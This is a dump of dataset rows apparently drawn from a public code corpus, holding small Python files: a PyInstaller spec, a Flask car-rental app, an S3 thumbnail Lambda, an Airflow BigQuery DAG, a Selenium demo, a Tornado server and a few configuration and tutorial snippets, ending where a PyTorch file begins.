blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2b5371fbe0d397efd87bd0c15a7b2fabb376d9e1 | 2a9b29f2a67fde3f5bd3a29355180ea40d2478a7 | /main.spec | 6c5d692837b1d6dfff709c7a768a45deb4e576d8 | [] | no_license | rafero1/mfpj-t1 | 854dc015abec3ff04ec3fdcfa53f3a26234ef7af | ef8a255900cc4df5964f0b219138477f1882aa2c | refs/heads/master | 2020-06-24T05:59:45.479754 | 2019-07-25T16:58:15 | 2019-07-25T16:58:15 | 198,870,570 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 944 | spec | # -*- mode: python -*-
# PyInstaller build spec: bundles main.py into a one-folder console app named 'main'.
# Executed by PyInstaller (Analysis/PYZ/EXE/COLLECT are injected), not imported.
block_cipher = None  # no bytecode encryption for the PYZ archive
# Analyse main.py and collect its imports, binaries and data files.
a = Analysis(['main.py'],
             # NOTE(review): absolute, user-specific Windows path — breaks on any
             # other machine; confirm before reusing this spec elsewhere.
             pathex=['C:\\Users\\Rafael Avilar\\workspace\\mfpj\\t1'],
             binaries=[],
             datas=[],
             hiddenimports=[],
             hookspath=[],
             runtime_hooks=[],
             excludes=[],
             win_no_prefer_redirects=False,
             win_private_assemblies=False,
             cipher=block_cipher,
             noarchive=False)
# Archive of pure-Python modules.
pyz = PYZ(a.pure, a.zipped_data,
             cipher=block_cipher)
# Console executable; exclude_binaries=True => binaries are shipped next to the
# exe by COLLECT below (one-folder mode rather than one-file).
exe = EXE(pyz,
          a.scripts,
          [],
          exclude_binaries=True,
          name='main',
          debug=False,
          bootloader_ignore_signals=False,
          strip=False,
          upx=True,  # compress with UPX if available
          console=True )
# Final dist/main folder: exe plus collected binaries, zipfiles and data.
coll = COLLECT(exe,
               a.binaries,
               a.zipfiles,
               a.datas,
               strip=False,
               upx=True,
               name='main')
| [
"rfl.avlar@outlook.com"
] | rfl.avlar@outlook.com |
c529ad2979c9aea0b99f011b42c1cb8a6eb4a4a0 | 9b9f3f4bb1c1d01c9d61432dbd7ed8138d06581c | /Car_rental_v1/car_rental.py | 4c6485fb15e3b178ee1d6a75c7bce513b025913e | [] | no_license | stqc/learning_flask | 0cc505722da7f32cc4c0c733841e543a2a1e0e23 | 231eb45fa1aafc00cfe09ee9a25f38eeb8bd6614 | refs/heads/master | 2023-01-06T22:17:35.990045 | 2020-11-12T17:07:20 | 2020-11-12T17:07:20 | 299,616,128 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,984 | py | import os
# Flask application setup: SQLite database (data.sqlite, next to this file)
# through Flask-SQLAlchemy, with Flask-Migrate wired in for schema migrations.
from flask import Flask, render_template,request,url_for,redirect,session
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from forms import upload_form
app = Flask(__name__)
# NOTE(review): hard-coded secret key — load from an environment variable in production.
app.config['SECRET_KEY'] ="supersecret"
base = os.path.abspath(os.path.dirname(__file__))  # directory containing this module
app.config['SQLALCHEMY_DATABASE_URI'] ='sqlite:///'+os.path.join(base,'data.sqlite')
db = SQLAlchemy(app)
Migrate(app,db)
class car(db.Model):
    """SQLAlchemy model for a rentable car.

    `id` is the caller-supplied car number (also the primary key); `ride`
    is the one-to-one link to the active Ride, if any.
    """
    __tablename__ ='car'
    id = db.Column(db.Integer,primary_key=True)
    name = db.Column(db.Text)       # car model name
    owner = db.Column(db.Text)      # owner's name
    booked = db.Column(db.Boolean)  # True while the car is out on a ride
    # uselist=False => at most one active Ride per car.
    ride = db.relationship('Ride',backref ='cars',uselist=False)
    def __init__(self,id,name,owner,booked):
        self.id = id
        self.name = name
        self.owner = owner
        self.booked = booked
    def __repr__(self):
        if self.ride:
            return f'{self.name} is booked for {self.ride.destination}'
        else:
            # NOTE(review): "avaialable" is a typo in user-visible text;
            # left untouched because this edit changes comments only.
            return f'{self.name} is avaialable'
    def get_cars(self):
        """Return this car's id when it is free; implicitly None otherwise."""
        if not self.booked:
            return self.id
class Ride(db.Model):
    """SQLAlchemy model for an active rental ride (row is deleted when the ride ends)."""
    __tablename__ ='rides'
    id = db.Column(db.Integer,primary_key=True)
    destination = db.Column(db.Text)
    source = db.Column(db.Text)
    # Foreign key to the car taken on this ride.
    car = db.Column(db.Integer,db.ForeignKey('car.id'))
    def __init__(self,destination,source,car):
        self.destination = destination
        self.source = source
        self.car = car
@app.route('/')
def index():
    """Home page: list every car in the system, booked and free alike."""
    all_cars = car.query.all()
    return render_template('home.html', cars_available=all_cars)
@app.route('/post_car', methods=['GET', 'POST'])
def post_car():
    """Register a new car from the upload form; redirect home on success."""
    form = upload_form()
    if not form.validate_on_submit():
        # GET request, or an invalid submission: (re)render the form.
        return render_template('cars.html', form=form)
    new_car = car(
        id=form.car_num.data,
        owner=form.name.data,
        name=form.car_model.data,
        booked=False,
    )
    db.session.add(new_car)
    db.session.commit()
    return redirect(url_for('index'))
@app.route('/rent', methods=['GET', 'POST'])
def rentcar():
    """Book a free car: create the Ride row and flag the car as booked."""
    if request.method == 'POST':
        car_id = request.form['car']
        ride = Ride(
            destination=request.form['destination'],
            source=request.form['source'],
            car=car_id,
        )
        chosen = car.query.filter_by(id=car_id).first()
        chosen.booked = True
        db.session.add_all([ride, chosen])
        db.session.commit()
        return redirect(url_for('index'))
    free_cars = car.query.filter_by(booked=False).all()
    return render_template('rent.html', cars_available=free_cars)
@app.route('/endride',methods=['GET','POST'])
def ride_end():
    """End an active ride: delete the Ride row and free the car.

    On success renders delete.html (the finished ride's endpoints are kept
    in the session for display); on a missing/unknown car the endride form
    is re-rendered.  Fix: the original wrapped everything in a bare
    ``except: pass``, silently hiding every failure (including real DB
    errors); only the expected failure modes are handled now.
    """
    if request.method == 'POST':
        try:
            r = request.form['car']
        except KeyError:
            # POST without a 'car' field — fall through to the form page.
            return render_template('endride.html')
        journey = Ride.query.filter_by(car=r).first()
        if journey is None:
            # No active ride for that car (same end state as the old
            # silently-swallowed AttributeError).
            return render_template('endride.html')
        session['d'] = journey.destination
        session['s'] = journey.source
        db.session.delete(journey)
        c = car.query.filter_by(id=r).first()
        c.booked = False
        db.session.commit()
        return render_template('delete.html')
    return render_template('endride.html')
@app.route('/remove_car', methods=['GET','POST'])
def rm_car():
    """Delete a car from the fleet, refusing while it is out on a ride.

    Fix: the original bare ``except: pass`` swallowed every error; only
    the expected failure modes (missing form field, unknown id) are
    handled now, and the unused ``busy`` bookkeeping variable is gone.
    """
    if request.method == 'POST':
        try:
            to_remove = request.form['car']
        except KeyError:
            # POST without a 'car' field — re-show the plain form.
            return render_template('remove_car.html')
        target = car.query.filter_by(id=to_remove).first()
        if target is None:
            # Unknown id: same end state as the old silent failure.
            return render_template('remove_car.html')
        session['removed'] = target.name
        session['owner'] = target.owner
        if target.booked:
            # Car is out on a ride — report it as busy instead of deleting.
            return render_template('remove_car.html', busy=True)
        db.session.delete(target)
        db.session.commit()
        return render_template('del_car.html')
    return render_template('remove_car.html')
# Run the Flask development server (debug=True: auto-reload + in-browser tracebacks;
# never use in production).
if __name__ == "__main__":
    app.run(debug=True)
| [
"noreply@github.com"
] | stqc.noreply@github.com |
b0d7ee97a930d6bb5f1f7a17fdb1b1c36996681a | f7bc2c6f0bce4397ba7554bc3cea726ce7c8a22d | /lambda_function.py | 038c6eaf2acc66b7e75f42d14e559c8e56e405c7 | [] | no_license | shojibMahabub/generate_thumbnail_s3_lambda | 4103512ff3787e47ccd616ba2db040053dc2b0a1 | f217bdad48b3157b1d0913df1baf2810784f0dc4 | refs/heads/master | 2022-12-01T03:39:54.898856 | 2020-03-09T06:35:52 | 2020-03-09T06:35:52 | 245,083,045 | 0 | 0 | null | 2022-11-22T05:22:14 | 2020-03-05T06:08:43 | Python | UTF-8 | Python | false | false | 3,054 | py | import boto3
import os
from PIL import Image
import pathlib
from io import BytesIO
# configuration
thumbimagebucket = 'resizedimagebucket0099'   # destination for generated thumbnails
backupimagebucket = 'backupimagebucket0099'   # destination for full-size copies
mainimagebucket = 'myimagebucket0099'         # bucket receiving the original uploads
# Module-level AWS clients so warm Lambda invocations reuse the connections.
client = boto3.client('s3')
s3 = boto3.resource('s3')
def delete_this_bucket(name):
    '''
    Delete every object in the bucket, then the bucket itself.

    S3 refuses to delete a non-empty bucket, so objects are removed first.
    Fix: the original called bucket.delete() INSIDE the object loop, which
    failed (silently) on every pass but the last, and never deleted an
    already-empty bucket.
    '''
    bucket = s3.Bucket(name)
    try:
        for obj in bucket.objects.all():
            obj.delete()
        bucket.delete()
    except Exception as e:
        # Keep the original best-effort behaviour, but say what broke.
        print("SOMETHING IS BROKEN !!", e)
def create_this_bucket(name, location):
    '''
    def create_this_bucket()
    param bucket_name, bucket_location
    Create an S3 bucket with the given name in the given AWS region.
    '''
    config = {'LocationConstraint': location}
    try:
        s3.create_bucket(Bucket=name, CreateBucketConfiguration=config)
    except Exception as err:
        print(err)
def upload_test_images(name):
    '''
    Upload every file in ./testimage to the given bucket, keyed by filename.

    Fix: paths must be joined onto the ./testimage directory.  The original
    used os.path.abspath(filename), which resolves against the *current
    working directory*, so uploads failed unless cwd happened to be
    ./testimage.  Sub-directories are now skipped as well.
    '''
    src_dir = './testimage'
    for each in os.listdir(src_dir):
        path = os.path.join(src_dir, each)
        if not os.path.isfile(path):
            continue  # upload_file cannot handle directories
        try:
            s3.Bucket(name).upload_file(path, each)
        except Exception as e:
            print(e)
def copy_to_other_bucket(src, des, key):
    """Copy object *key* from bucket *src* into bucket *des* under the same key."""
    try:
        destination = s3.Bucket(des)
        destination.copy({'Bucket': src, 'Key': key}, key)
    except Exception as err:
        print(err)
def resize_image(src_bucket, des_bucket):
    '''
    Thumbnail every object under uploads/ in src_bucket into des_bucket.

    Fixes over the original:
    - a fresh BytesIO per image: the single shared buffer accumulated the
      bytes of every previous image, corrupting all thumbnails after the
      first;
    - removed an unused Bucket handle and a local boto3 client that
      shadowed the module-level one;
    - response.get('Contents', []) guards against a KeyError when the
      prefix matches nothing.
    '''
    size = (500, 500)  # bounding box for Image.thumbnail (aspect ratio preserved)
    response = client.list_objects_v2(Bucket=src_bucket, Prefix='uploads/')
    for obj in response.get('Contents', []):
        key = obj['Key']
        print(key)
        body = client.get_object(Bucket=src_bucket, Key=key)
        try:
            im = Image.open(BytesIO(body['Body'].read()))
            im.thumbnail(size, Image.ANTIALIAS)
            # ISSUE : https://stackoverflow.com/questions/4228530/pil-thumbnail-is-rotating-my-image
            out = BytesIO()
            im.save(out, format=im.format)
            out.seek(0)
            client.put_object(
                Body=out,
                Bucket=des_bucket,
                Key=key
            )
        except Exception as e:
            print(e)
def lambda_handler(event, context):
    """Lambda entry point: back up every original under uploads/, then build thumbnails."""
    response = client.list_objects_v2(Bucket=mainimagebucket, Prefix='uploads/')
    # 'Contents' is absent when the prefix matches no objects — guard the KeyError.
    for obj in response.get('Contents', []):
        copy_to_other_bucket(mainimagebucket, backupimagebucket, obj['Key'])
    resize_image(mainimagebucket, thumbimagebucket)
"shojibmahabub630@gmail.com"
] | shojibmahabub630@gmail.com |
3ea613abd2f6af3b13759a1d514257a951de2594 | 4d7968edb07729f43739b77fb7be31c9baefd84f | /proxypool/setting.py | 1b7cabafdbe40169019998961036912642dbb274 | [
"Apache-2.0"
] | permissive | AetheWu/proxy_pool | 7dd4e9c588802d744d0c4ca8286d8a9497ad83a4 | 53659038bd93378e97258d6928afff90da4eefa3 | refs/heads/master | 2020-04-08T12:38:14.026188 | 2018-12-11T05:26:40 | 2018-12-11T05:26:40 | 159,355,424 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 534 | py | "代理池全局参数设置"
# Proxy-pool parameters (proxy scoring and pool size)
MAX_SCORE = 100
MIN_SCORE = 0
INITIAL_SCORE = 10
POOL_CAPACITY = 200
# MongoDB connection
MONGO_HOST = 'mongodb://localhost:27017'
MONGO_KEY = 'proxy'
# Scheduler loop periods (units presumably seconds — confirm in the scheduler):
TEST_CYCLE = 60
GET_CYCLE = 20
API_ENABLED = True
TEST_ENABLED = True
GET_ENABLED = False
# Tester-module settings
TEST_URL = 'http://www.bilibili.com'
BATCH_TEST_SIZE = 20
VALID_STATUS_CODES = [200]
# Page-crawl settings
STEP_PAGES = 10 # number of pages crawled per batch
MAX_PAGE = 50 # maximum number of pages to crawl
| [
"wzh942633545@gmail.com"
] | wzh942633545@gmail.com |
3beabab40585a32d5f3d2e20747ac5df3265cd43 | 5279abc11aa32cf2ff33159fb72a180ac3145d62 | /parallel_processing_gcp.py | a130abd543d67ff6729872d2de0db3b7900651db | [] | no_license | vatsalsmehta/Apache-Airflow-Bigdata-Pipelines | 891947195ff452e05ef0bf2a998b43bd6949e06e | b3debb64ca0d07698254b872a2db11b5067c1f83 | refs/heads/main | 2023-07-15T15:34:40.944229 | 2021-08-17T12:32:50 | 2021-08-17T12:32:50 | 389,121,482 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,128 | py | #importing libraries
import csv
from airflow.operators.python_operator import PythonOperator
from airflow.contrib.operators.gcs_to_bq import \
GoogleCloudStorageToBigQueryOperator
from google.cloud import bigquery
import pandas as pd
import calendar
import time
from google.cloud import storage
from pandas import DataFrame
from datetime import timedelta, datetime
from airflow import DAG
from airflow.contrib.operators.bigquery_get_data import BigQueryGetDataOperator
from airflow.operators import python_operator
from airflow.models import Variable
from airflow.contrib.operators.bigquery_operator import BigQueryOperator
from airflow.contrib.operators.bigquery_check_operator import BigQueryCheckOperator
import googleapiclient.discovery
import numpy as np
from airflow.models import Variable
import pytz
from datetime import datetime as dt
import sys
import calendar
import warnings
import requests
from google.api_core.client_options import ClientOptions
import math
# Default task arguments shared by every task in the DAG.
def_argsman={
    "owner":"vatron",
    "depends_on_past":False,
    "retry_delay":timedelta(minutes=1),
    "start_date":datetime(2021,7,20),
    "retries":1
}
# NOTE(review): a second DAG is created below via `with DAG(...)` with a
# slightly different dag_id ("parallel_processing_gcp" vs the ".py"-suffixed
# one here) — this module-level instance looks unused/shadowed; confirm and
# remove one of the two.
dag=DAG(
    dag_id="parallel_processing_gcp.py",
    schedule_interval="@once",
    default_args=def_argsman,
    catchup=False
)
def get_started(**kwargs):
    """No-op kickoff task: announces that the parallel fan-out starts next."""
    message = "Starting parallel processing from next task"
    print(message)
def day1_query(**kwargs):
    """Run the day-1 event-frequency query and dump the result as CSV."""
    bq = bigquery.Client()
    sql_query = ''' '''
    frame = bq.query(sql_query).to_dataframe()
    out_path = '/home/airflow/gcs/data/xyz_preprocessing_datafiles/day1_eventfreq.csv'
    try:
        frame.to_csv(out_path, index=False)
        print("\n\nCSV File Saved\n\n")
    except Exception as err:
        print("!!!!!!!!!!!!!!!!!!!!Exception occured!!!!!!!!!!!!!!!!!!", err)
        raise Exception(err)
def day2_query(**kwargs):
    """Run the day-2 event-frequency query and dump the result as CSV."""
    bq = bigquery.Client()
    sql_query = '''Your day 2 sql query'''
    frame = bq.query(sql_query).to_dataframe()
    out_path = '/home/airflow/gcs/data/xyz_preprocessing_datafiles/day2_eventfreq.csv'
    try:
        frame.to_csv(out_path, index=False)
        print("\n\nCSV File Saved\n\n")
    except Exception as err:
        print("!!!!!!!!!!!!!!!!!!!!Exception occured!!!!!!!!!!!!!!!!!!", err)
        raise Exception(err)
def day3_query(**kwargs):
    """Run the day-3 event-frequency query and dump the result as CSV."""
    bq = bigquery.Client()
    sql_query = '''your day 3 sql query'''
    frame = bq.query(sql_query).to_dataframe()
    out_path = '/home/airflow/gcs/data/xyz_preprocessing_datafiles/day3_eventfreq.csv'
    try:
        frame.to_csv(out_path, index=False)
        print("\n\nCSV File Saved\n\n")
    except Exception as err:
        print("!!!!!!!!!!!!!!!!!!!!Exception occured!!!!!!!!!!!!!!!!!!", err)
        raise Exception(err)
def day4_query(**kwargs):
    """Run the day-4 event-frequency query and dump the result as CSV."""
    bq = bigquery.Client()
    sql_query = ''' Your SQL Query Here'''
    frame = bq.query(sql_query).to_dataframe()
    out_path = '/home/airflow/gcs/data/xyz_preprocessing_datafiles/day4_eventfreq.csv'
    try:
        frame.to_csv(out_path, index=False)
        print("\n\nCSV File Saved\n\n")
    except Exception as err:
        print("!!!!!!!!!!!!!!!!!!!!Exception occured!!!!!!!!!!!!!!!!!!", err)
        raise Exception(err)
def day5_query(**kwargs):
    """Run the day-5 event-frequency query and dump the result as CSV."""
    bq = bigquery.Client()
    sql_query = '''Your Sql Query here'''
    frame = bq.query(sql_query).to_dataframe()
    out_path = '/home/airflow/gcs/data/xyz_preprocessing_datafiles/day5_eventfreq.csv'
    try:
        frame.to_csv(out_path, index=False)
        print("\n\nCSV File Saved\n\n")
    except Exception as err:
        print("!!!!!!!!!!!!!!!!!!!!Exception occured!!!!!!!!!!!!!!!!!!", err)
        raise Exception(err)
def day6_query(**kwargs):
    """Run the day-6 event-frequency query and dump the result as CSV."""
    bq = bigquery.Client()
    sql_query = '''Your Sql Query here'''
    frame = bq.query(sql_query).to_dataframe()
    out_path = '/home/airflow/gcs/data/xyz_preprocessing_datafiles/day6_eventfreq.csv'
    try:
        frame.to_csv(out_path, index=False)
        print("\n\nCSV File Saved\n\n")
    except Exception as err:
        print("!!!!!!!!!!!!!!!!!!!!Exception occured!!!!!!!!!!!!!!!!!!", err)
        raise Exception(err)
def day7_query(**kwargs):
    """Run the day-7 event-frequency query and dump the result as CSV."""
    bq = bigquery.Client()
    sql_query = '''Your Sql Query here'''
    frame = bq.query(sql_query).to_dataframe()
    out_path = '/home/airflow/gcs/data/xyz_preprocessing_datafiles/day7_eventfreq.csv'
    try:
        frame.to_csv(out_path, index=False)
        print("\n\nCSV File Saved\n\n")
    except Exception as err:
        print("!!!!!!!!!!!!!!!!!!!!Exception occured!!!!!!!!!!!!!!!!!!", err)
        raise Exception(err)
def ad_id_query(**kwargs):
    """Fetch the ad-id table and write it to /asu.csv.

    NOTE(review): this writes /asu.csv, but fn1_evpreprocessing reads
    ad_id_day1_day7_eventfreq.csv — confirm the intended output path.
    """
    bq = bigquery.Client()
    sql_query = '''Another Sql Query'''
    frame = bq.query(sql_query).to_dataframe()
    try:
        frame.to_csv('/asu.csv', index=False)
    except Exception as error:
        print("Exception occured", error)
        raise Exception(error)
def fn1_evpreprocessing(**kwargs):
    """Load the day1..day7 event-frequency CSVs plus the ad-id file, then run
    the (currently placeholder) frequency-preprocessing step."""
    base = '/home/airflow/gcs/data/xyz_preprocessing_datafiles/'
    try:
        dfs = [pd.read_csv(base + 'day' + str(i) + '_eventfreq.csv') for i in range(1, 8)]
        ad = pd.read_csv(base + 'ad_id_day1_day7_eventfreq.csv')
    except Exception as error:
        print("Exception occured", error)
        raise Exception(error)
    print("All Files Read Successfully")

    def preprocessing_evfreq(frames, ad_frame):
        # Placeholder step: returns the frames unchanged.
        return frames

    evfreq = preprocessing_evfreq(dfs, ad)
def push_googlebq(**Kwargs):
    """Build the GCS→BigQuery load operator for the preprocessed ad-id CSV.

    Returns the operator; the DAG block below calls this function to create
    the task (unlike the PythonOperator tasks, which are built inline).
    """
    return GoogleCloudStorageToBigQueryOperator(
        task_id="push_googlebq",
        source_objects=['data/xyz_preprocessing_datafiles/ad_id_day1_day7.csv'],
        source_format='CSV',
        bucket='asia-east2-xyz-tatacliq-as-c3e3e551-bucket',
        write_disposition='WRITE_TRUNCATE',
        skip_leading_rows=1,
        destination_project_dataset_table='suger_cosmetics_branch.test_ppp',
        schema_fields=[
            {'name': 'string_field_0', 'type': 'STRING', 'mode': 'NULLABLE'},
        ]
    )
def xyz_usefulfeatures_query(**kwargs):
    """Dump the xyz useful-features table to CSV on the GCS-mounted volume."""
    bq = bigquery.Client()
    sql_query = '''Select * from xyz'''
    frame = bq.query(sql_query).to_dataframe()
    print("Query executed")
    out_path = '/home/airflow/gcs/data/xyz_preprocessing_datafiles/xyz_usefulfeatures.csv'
    try:
        frame.to_csv(out_path, index=False)
        print("\n\nCSV File Saved\n\n")
    except Exception as error:
        print("!!!!!!!!!!!!!!!!!!!!Exception occured!!!!!!!!!!!!!!!!!!", error)
        raise Exception(error)
def preprocessing_evdata(**kwargs):
    """Load the useful-features CSV and the city-tier spreadsheet."""
    base = '/home/airflow/gcs/data/xyz_preprocessing_datafiles/'
    try:
        evdata = pd.read_csv(base + 'xyz_usefulfeatures.csv')
        city_tier = pd.read_excel(base + 'Copy of City_Tier.xlsx')
    except Exception as error:
        print("Exception occured", error)
        raise Exception(error)
# NOTE(review): this creates a SECOND DAG whose dag_id ("parallel_processing_gcp")
# differs from the module-level one above ("parallel_processing_gcp.py") —
# confirm which is intended and drop the other.
with DAG(dag_id="parallel_processing_gcp", schedule_interval="@once", default_args=def_argsman, catchup=False) as dag:
    # Task objects: one kickoff, seven per-day extracts, the ad-id extract,
    # the merge/preprocess step, the BigQuery load and two downstream steps.
    xyz_start = PythonOperator(task_id="xyz_start",python_callable=get_started,provide_context=True,)
    start_day1_query = PythonOperator(task_id="start_day1_query",python_callable=day1_query,provide_context=True,)
    start_day2_query = PythonOperator(task_id="start_day2_query",python_callable=day2_query,provide_context=True,)
    start_day3_query = PythonOperator(task_id="start_day3_query",python_callable=day3_query,provide_context=True,)
    start_day4_query = PythonOperator(task_id="start_day4_query",python_callable=day4_query,provide_context=True,)
    start_day5_query = PythonOperator(task_id="start_day5_query",python_callable=day5_query,provide_context=True,)
    start_day6_query = PythonOperator(task_id="start_day6_query",python_callable=day6_query,provide_context=True,)
    start_day7_query = PythonOperator(task_id="start_day7_query",python_callable=day7_query,provide_context=True,)
    start_ad_id_query=PythonOperator(task_id="start_ad_id_query",python_callable=ad_id_query,provide_context=True,)
    start_preprocessing_evpreprocessing=PythonOperator(task_id="start_preprocessing_evpreprocessing",python_callable=fn1_evpreprocessing,provide_context=True,)
    start_push_bigquery=push_googlebq()
    start_xyz_usefulfeatures=PythonOperator(task_id="start_xyz_usefulfeatures",python_callable=xyz_usefulfeatures_query,provide_context=True,)
    start_preprocessing_evdata=PythonOperator(task_id="start_preprocessing_evdata",python_callable=preprocessing_evdata,provide_context=True,)
    # Fan-out: the eight extract tasks run in parallel after the kickoff.
    xyz_start >> start_day1_query
    xyz_start >> start_day2_query
    xyz_start >> start_day3_query
    xyz_start >> start_day4_query
    xyz_start >> start_day5_query
    xyz_start >> start_day6_query
    xyz_start >> start_day7_query
    xyz_start>>start_ad_id_query
    # Fan-in: preprocessing waits on all eight extracts ...
    start_day1_query>>start_preprocessing_evpreprocessing
    start_day7_query>>start_preprocessing_evpreprocessing
    start_day4_query>>start_preprocessing_evpreprocessing
    start_day5_query>>start_preprocessing_evpreprocessing
    start_day6_query>>start_preprocessing_evpreprocessing
    start_day2_query>>start_preprocessing_evpreprocessing
    start_day3_query>>start_preprocessing_evpreprocessing
    start_ad_id_query>>start_preprocessing_evpreprocessing
    # ... and then the linear tail runs: load to BigQuery, re-extract, final prep.
    start_preprocessing_evpreprocessing>>start_push_bigquery>>start_xyz_usefulfeatures>>start_preprocessing_evdata
| [
"vatsalsmehta@gmail.com"
] | vatsalsmehta@gmail.com |
f58f32f62c15a00c4d69fa0ab14dab3b58eba07b | 8069e5de0d28774d58a16cdb44ed59e35fb91663 | /dict_example.py | b755645e6db001094fc7014a69ee50124f8c4a04 | [] | no_license | acqant/demos | be3c829457ffe4fd0724f87b26614d2784a2be3f | f70cf8140fa0ac724913ad82f44d0df740e13f9b | refs/heads/master | 2020-07-21T12:28:28.101774 | 2019-09-11T21:22:15 | 2019-09-11T21:22:15 | 206,864,956 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | import datetime
def simple_dict():
    """Demo of basic dict usage: insertion, membership test, items()/keys() views."""
    my_dict = {}
    my_dict[1] = 'I exist'
    my_dict[2] = 'second entry'
    # checking if a key exists
    def my_function(key, lookup):
        if key in lookup:
            # Bug fix: print the value for the *requested* key — the original
            # always printed lookup[1] regardless of which key was asked for.
            print(f'\t{lookup[key]}')
        else:
            print(f'\tNo key {key} found in my_dict')
    print("When key exists:")
    my_function(1, my_dict)
    print("When key does NOT exist:")
    my_function(10, my_dict)
    print(f'Print all items with my_dict.items:\n {my_dict.items()}')
    # Bug fix: the label said ".items" while showing keys().
    print(f'Print all keys with my_dict.keys:\n {my_dict.keys()}')
    for key, value in my_dict.items():
        print(f"Key is {key} and item is {value}.")
| [
"acqant@users.noreply.github.com"
] | acqant@users.noreply.github.com |
4b9d8fc4177861f3e58be01a4f9266084f458dea | a066d8b8b9e4c2ce2e57b2603a2826e0c5cd74fd | /lessons/keywords_and_control_flow/examples/ex4.py | 5d6993ff80e5c43644394becbd59d96c6744816c | [] | no_license | delucco/PyClassLessons | a561c5873d7d8ae1cabeb3b5986eb323ae9faf62 | 7af775d102450b8a9d28da8a8fd475ae3144eabf | refs/heads/master | 2021-01-14T12:06:49.382685 | 2015-05-19T01:53:03 | 2015-05-19T01:53:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 176 | py |
# while/else demo (Python 2 print syntax): the else clause runs only when the
# loop finishes without hitting `break`.
i = 0
while i < 100:
    if not i % 10:
        # i % 10 == 0, i.e. i is a multiple of 10
        # break
        # (uncomment `break` above to see the else clause being skipped)
        print "Divisible by 10:", i
    i += 1
else:
    print "Else statement has occurred."
print "This is the end."
| [
"robbintt@gmail.com"
] | robbintt@gmail.com |
a9204e5cf25d9595f26dafcd328c3ce4c5b295cc | e7865530556fb229b50bdf6d04c68e095372e143 | /AnalyseServer/src/server/Analyse.py | 97b27b440b31dd6a74fca5927e44e65b66a72330 | [] | no_license | asdzheng/AnalyseServer | a37b7cba0cdd064ea611dd8dd481152b38108c86 | e71f21c9da5699c54c4679ad0d996df4d2bdd47c | refs/heads/master | 2016-09-06T01:30:25.195724 | 2014-03-09T08:14:10 | 2014-03-09T08:14:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 751 | py | import tornado.ioloop
import tornado.web
from pymongo import Connection
class MainHandler(tornado.web.RequestHandler):
    """Echo handler: GET returns the 'json' argument; POST also stores it in MongoDB."""
    def get(self):
        # Echo the 'json' query argument back (default "Hello World").
        json = self.get_argument('json', "Hello World")
        self.write(json)
    def post(self):
        conn = Connection()
        db = conn.First
        appCollection = db.app1
        json = self.get_argument('json', 'Hello World~')
        # Bug fix: strip the first and last character with a *slice*.
        # The original `json[1,len(json)-1]` indexed the string with a
        # tuple, which raises TypeError on every POST.
        json = json[1:len(json)-1]
        # NOTE(review): pymongo's insert() expects a document (dict), not a
        # raw string — confirm whether the payload should be parsed first.
        appCollection.insert(json)
        self.write(json)
# Start the Tornado IOLoop, serving MainHandler at /AnalyseServer on port 8080.
if __name__ == "__main__":
    application = tornado.web.Application([(r"/AnalyseServer", MainHandler)])
    application.listen(8080)
    tornado.ioloop.IOLoop.instance().start()
| [
"zhengjiabo@gmail.com"
] | zhengjiabo@gmail.com |
d5cd69bc39db446dab3c1bfa0714fd10795d9b13 | 107941a50c3adc621563fe0254fd407ea38d752e | /spider_03.py | ff843e21ab654378dec18c1fae8d152647acbf11 | [] | no_license | zhangliang852469/spider_ | 758a4820f8bd25ef6ad0edbd5a4efbaaa410ae08 | 718208c4d8e6752bbe8d66a209e6d7446c81d139 | refs/heads/master | 2020-04-05T07:12:03.790358 | 2018-11-08T07:17:22 | 2018-11-08T07:17:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,034 | py | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
"""节点交互 """
from selenium import webdriver
import time
# browser = webdriver.Chrome()
# browser.get('https://www.taobao.com')
# input = browser.find_element_by_id('q')
# input.send_keys('iPhone')
# time.sleep(1)
# input.clear()
# input.send_keys('iPad')
# button = browser.find_element_by_class_name('btn-search')
# button.click()
"""在这里我们首先驱动浏览器打开淘宝,然后用 find_element_by_id() 方法获取输入框,
然后用 send_keys() 方法输入 iPhone 文字,等待一秒之后用 clear() 方法清空输入框,
再次调用 send_keys() 方法输入 iPad 文字,之后再用 find_element_by_class_name()
方法获取搜索按钮,最后调用 click() 方法完成搜索动作。"""
browser = webdriver.Chrome()
browser.get('https://www.taobao.com')
input = browser.find_element_by_id('q')
input.send_keys('iPone')
time.sleep(1)
input.clear()
input.send_keys('iPad')
button = browser.find_element_by_class_name('btn-search')
button.click()
| [
"710567585@qq.com"
] | 710567585@qq.com |
733066d1f4c502422a562cffcbd197aad6d660e1 | e2fdc0dbaac7eb6b0acdfb8990b710d418a49a70 | /utils/logistic_regression_pytorch.py | 0a288663f217db82e6aad19231257354f8c9ed0d | [
"MIT"
] | permissive | ikanher/AHGP | 55580df34e8d41014a13dce08dd18f36c2058cfd | 8750823790ec6abece78e31cc0ec7a6162656a75 | refs/heads/main | 2023-02-18T03:44:29.000162 | 2021-01-14T09:37:25 | 2021-01-14T09:37:25 | 329,567,127 | 0 | 0 | MIT | 2021-01-14T09:28:52 | 2021-01-14T09:28:52 | null | UTF-8 | Python | false | false | 3,491 | py | import time
import numpy as np
import torch
